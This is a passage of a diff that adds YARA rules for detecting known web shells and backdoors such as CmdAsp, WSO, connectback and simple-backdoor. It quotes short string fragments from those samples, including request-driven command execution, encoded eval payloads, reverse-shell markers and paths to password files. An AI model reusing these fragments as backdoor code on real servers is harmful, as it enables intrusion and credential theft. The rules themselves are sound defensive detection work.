+		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
+	condition:
+		2 of them
+}
+rule STNC_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file STNC.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
+	strings:
+		$s0 = "drmist.ru" fullword
+		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
+		$s2 = "STNC WebShell"
+		$s3 = "http://www.security-teams.net/index.php?showtopic="
+	condition:
+		1 of them
+}
+rule aZRaiLPhp_v1_0_php {
+	meta:
+		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "26b2d3943395682e36da06ed493a3715"
+	strings:
+		$s0 = "azrailphp"
+		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
+		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
+	condition:
+		2 of them
+}
+rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {
+	meta:
+		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
+	strings:
+		$s0 = ";$sd98=\"john.barker446@gmail.com\""
+		$s1 = "print \"Sending mail to $to....... \";"
+		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
+	condition:
+		1 of them
+}
+rule zacosmall_php {
+	meta:
+		description = "Semi-Auto-generated  - file zacosmall.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+	strings:
+		$s0 = "rand(1,99999);$sj98"
+		$s1 = "$dump_file.='`'.$rows2[0].'`"
+		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
+	condition:
+		2 of them
+}
+rule CmdAsp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "64f24f09ec6efaa904e2492dffc518b9"
+	strings:
+		$s0 = "CmdAsp.asp" 
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s2 = "-- Use a poor man's pipe ... a temp file --" 
+		$s3 = "maceo @ dogmile.com" 
+	condition:
+		2 of them
+}
+rule simple_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+	strings:
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" 
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+	condition:
+		2 of them
+}
+rule mysql_shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d42aec2891214cace99b3eb9f3e21a63"
+	strings:
+		$s0 = "SooMin Kim"
+		$s1 = "smkim@popeye.snu.ac.kr"
+		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
+	condition:
+		1 of them
+}
+rule Dive_Shell_1_0___Emperor_Hacking_Team_php {
+	meta:
+		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1b5102bdc41a7bc439eea8f0010310a5"
+	strings:
+		$s0 = "Emperor Hacking TEAM"
+		$s1 = "Simshell" fullword
+		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
+		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
+	condition:
+		2 of them
+}
+rule Asmodeus_v0_1_pl {
+	meta:
+		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0978b672db0657103c79505df69cb4bb"
+	strings:
+		$s0 = "[url=http://www.governmentsecurity.org"
+		$s1 = "perl asmodeus.pl client 6666 127.0.0.1" 
+		$s2 = "print \"Asmodeus Perl Remote Shell"
+		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+	condition:
+		2 of them
+}
+rule backup_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backup.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aeee3bae226ad57baf4be8745c3f6094"
+	strings:
+		$s0 = "#phpMyAdmin MySQL-Dump" fullword
+		$s2 = ";db_connect();header('Content-Type: application/octetstr"
+		$s4 = "$data .= \"#Database: $database" fullword
+	condition:
+		all of them
+}
+rule Reader_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Reader.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+	strings:
+		$s1 = "Mehdi & HolyDemon"
+		$s2 = "www.infilak."
+		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
+	condition:
+		2 of them
+}
+rule phpshell17_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpshell17.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
+	strings:
+		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
+		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+	condition:
+		1 of them
+}
+rule myshell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file myshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "62783d1db52d05b1b6ae2403a7044490"
+	strings:
+		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
+		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
+		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
+	condition:
+		2 of them
+}
+rule SimShell_1_0___Simorgh_Security_MGZ_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
+	strings:
+		$s0 = "Simorgh Security Magazine " 
+		$s1 = "Simshell.css"
+		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
+		$s3 = "www.simorgh-ev.com"
+	condition:
+		2 of them
+}
+rule jspshall_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
+	strings:
+		$s0 = "kj021320"
+		$s1 = "case 'T':systemTools(out);break;"
+		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
+	condition:
+		2 of them
+}
+rule webshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file webshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "e425241b928e992bde43dd65180a4894"
+	strings:
+		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
+		$s3 = "PHP Web Shell"
+	condition:
+		all of them
+}
+rule rootshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file rootshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "265f3319075536030e59ba2f9ef3eac6"
+	strings:
+		$s0 = "shells.dl.am"
+		$s1 = "This server has been infected by $owner"
+		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
+		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
+	condition:
+		2 of them
+}
+rule connectback2_pl {
+	meta:
+		description = "Semi-Auto-generated  - file connectback2.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "473b7d226ea6ebaacc24504bd740822e"
+	strings:
+		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
+		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
+		$s2 = "ConnectBack Backdoor"
+	condition:
+		1 of them
+}
+rule DefaceKeeper_0_2_php {
+	meta:
+		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "713c54c3da3031bc614a8a55dccd7e7f"
+	strings:
+		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
+		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
+	condition:
+		1 of them
+}
+rule shells_PHP_wso {
+	meta:
+		description = "Semi-Auto-generated  - file wso.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "33e2891c13b78328da9062fbfcf898b6"
+	strings:
+		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
+		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
+	condition:
+		1 of them
+}
+rule backdoor1_php {
+	meta:
+		description = "Semi-Auto-generated  - file backdoor1.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "e1adda1f866367f52de001257b4d6c98"
+	strings:
+		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
+		$s2 = "class backdoor {"
+		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
+	condition:
+		1 of them
+}
+rule elmaliseker_asp {
+	meta:
+		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+	strings:
+		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
+		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
+		$s2 = "dim zombie_array,special_array"
+		$s3 = "http://vnhacker.org"
+	condition:
+		1 of them
+}
+rule indexer_asp {
+	meta:
+		description = "Semi-Auto-generated  - file indexer.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+	strings:
+		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
+	condition:
+		1 of them
+}
+rule DxShell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "33a2b31810178f4c2e71fbdeb4899244"
+	strings:
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
+	condition:
+		1 of them
+}
+rule s72_Shell_v1_1_Coding_html {
+	meta:
+		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+	strings:
+		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
+		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
+		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\"" 
+	condition:
+		1 of them
+}
+rule hidshell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file hidshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c2f3327d60884561970c63ffa09439a4"
+	strings:
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+	condition:
+		all of them
+}
+rule kacak_asp {
+	meta:
+		description = "Semi-Auto-generated  - file kacak.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "907d95d46785db21331a0324972dda8c"
+	strings:
+		$s0 = "Kacak FSO 1.0"
+		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
+		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
+		$s4 = "mailto:BuqX@hotmail.com"
+	condition:
+		1 of them
+}
+rule PHP_Backdoor_Connect_pl_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "57fcd9560dac244aeaf95fd606621900"
+	strings:
+		$s0 = "LorD of IRAN HACKERS SABOTAGE"
+		$s1 = "LorD-C0d3r-NT" 
+		$s2 = "echo --==Userinfo==-- ;"
+	condition:
+		1 of them
+}
+rule Antichat_Socks5_Server_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
+	strings:
+		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+		$s3 = "#   [+] Domain name address type"
+		$s4 = "www.antichat.ru"
+	condition:
+		1 of them
+}
+rule Antichat_Shell_v1_3_php {
+	meta:
+		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "40d0abceba125868be7f3f990f031521"
+	strings:
+		$s0 = "Antichat"
+		$s1 = "Can't open file, permission denide"
+		$s2 = "$ra44"
+	condition:
+		2 of them
+}
+rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {
+	meta:
+		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+	strings:
+		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
+		$s1 = "Mode Shell v1.0</font></span>"
+		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
+	condition:
+		1 of them
+}
+rule mysql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "12bbdf6ef403720442a47a3cc730d034"
+	strings:
+		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
+		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
+	condition:
+		1 of them
+}
+rule Worse_Linux_Shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+	strings:
+		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
+		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
+	condition:
+		1 of them
+}
+rule cyberlords_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "03b06b4183cb9947ccda2c3d636406d4"
+	strings:
+		$s0 = "Coded by n0 [nZer0]"
+		$s1 = " www.cyberlords.net"
+		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
+		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
+	condition:
+		1 of them
+}
+rule cmd_asp_5_1_asp {
+	meta:
+		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+	strings:
+		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+	condition:
+		1 of them
+}
+rule pws_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file pws.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
+	strings:
+		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
+	condition:
+		2 of them
+}
+rule PHP_Shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+	strings:
+		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+	condition:
+		all of them
+}
+rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {
+	meta:
+		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
+	strings:
+		$s0 = "Ayyildiz"
+		$s1 = "TouCh By iJOo"
+		$s2 = "First we check if there has been asked for a working directory"
+		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
+	condition:
+		2 of them
+}
+rule EFSO_2_asp {
+	meta:
+		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
+	strings:
+		$s0 = "Ejder was HERE"
+		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
+	condition:
+		2 of them
+}
+rule lamashell_php {
+	meta:
+		description = "Semi-Auto-generated  - file lamashell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "de9abc2e38420cad729648e93dfc6687"
+	strings:
+		$s0 = "lama's'hell" fullword
+		$s1 = "if($_POST['king'] == \"\") {"
+		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
+	condition:
+		1 of them
+}
+rule Ajax_PHP_Command_Shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "93d1a2e13a3368a2472043bd6331afe9"
+	strings:
+		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
+		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
+		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
+	condition:
+		1 of them
+}
+rule JspWebshell_1_2_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "70a0ee2624e5bbe5525ccadc467519f6"
+	strings:
+		$s0 = "JspWebshell"
+		$s1 = "CreateAndDeleteFolder is error:"
+		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
+		$s3 = "String _password =\"111\";"
+	condition:
+		2 of them
+}
+rule Sincap_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b68b90ff6012a103e57d141ed38a7ee9"
+	strings:
+		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
+		$s2 = "$tampon4=$tampon3-1"
+		$s3 = "@aventgrup.net"
+	condition:
+		2 of them
+}
+rule Test_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Test.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "77e331abd03b6915c6c6c7fe999fcb50"
+	strings:
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+		$s2 = "fwrite ($fp, \"$yazi\");" fullword
+		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+	condition:
+		1 of them
+}
+rule Phyton_Shell_py {
+	meta:
+		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "92b3c897090867c65cc169ab037a0f55"
+	strings:
+		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
+		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+	condition:
+		1 of them
+}
+rule mysql_tool_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
+	strings:
+		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
+		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
+		$s4 = "<div align=\"center\">The backup process has now started<br "
+	condition:
+		1 of them
+}
+rule Zehir_4_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7f4e12e159360743ec016273c3b9108c"
+	strings:
+		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
+		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
+	condition:
+		1 of them
+}
+rule sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "330af9337ae51d0bac175ba7076d6299"
+	strings:
+		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
+		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
+	condition:
+		1 of them
+}
+rule phpbackdoor15_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0fdb401a49fc2e481e3dfd697078334b"
+	strings:
+		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
+		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
+		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
+	condition:
+		1 of them
+}
+rule phpjackal_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpjackal.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
+	strings:
+		$s3 = "$dl=$_REQUEST['downloaD'];"
+		$s4 = "else shelL(\"perl.exe $name $port\");"
+	condition:
+		1 of them
+}
+rule sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8334249cbb969f2d33d678fec2b680c5"
+	strings:
+		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
+		$s2 = "http://rst.void.ru"
+		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+	condition:
+		1 of them
+}
+rule cgi_python_py {
+	meta:
+		description = "Semi-Auto-generated  - file cgi-python.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0a15f473e2232b89dae1075e1afdac97"
+	strings:
+		$s0 = "a CGI by Fuzzyman"
+		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
+		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
+	condition:
+		1 of them
+}
+rule ru24_post_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5b334d494564393f419af745dc1eeec7"
+	strings:
+		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s4 = "Writed by DreAmeRz" fullword
+	condition:
+		1 of them
+}
+rule DTool_Pro_php {
+	meta:
+		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "366ad973a3f327dfbfb915b0faaea5a6"
+	strings:
+		$s0 = "r3v3ng4ns\\nDigite"
+		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
+		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
+	condition:
+		1 of them
+}
+rule telnetd_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnetd.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5f61136afd17eb025109304bd8d6d414"
+	strings:
+		$s0 = "0ldW0lf" fullword
+		$s1 = "However you are lucky :P"
+		$s2 = "I'm FuCKeD"
+		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
+		$s4 = "atrix@irc.brasnet.org"
+	condition:
+		1 of them
+}
+rule php_include_w_shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "4e913f159e33867be729631a7ca46850"
+	strings:
+		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
+		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
+	condition:
+		1 of them
+}
+rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {
+	meta:
+		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6163b30600f1e80d2bb5afaa753490b6"
+	strings:
+		$s0 = "Safe0ver" fullword
+		$s1 = "Script Gecisi Tamamlayamadi!"
+		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
+	condition:
+		1 of them
+}
+rule shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1a95f0163b6dea771da1694de13a3d8d"
+	strings:
+		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');" 
+		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+	condition:
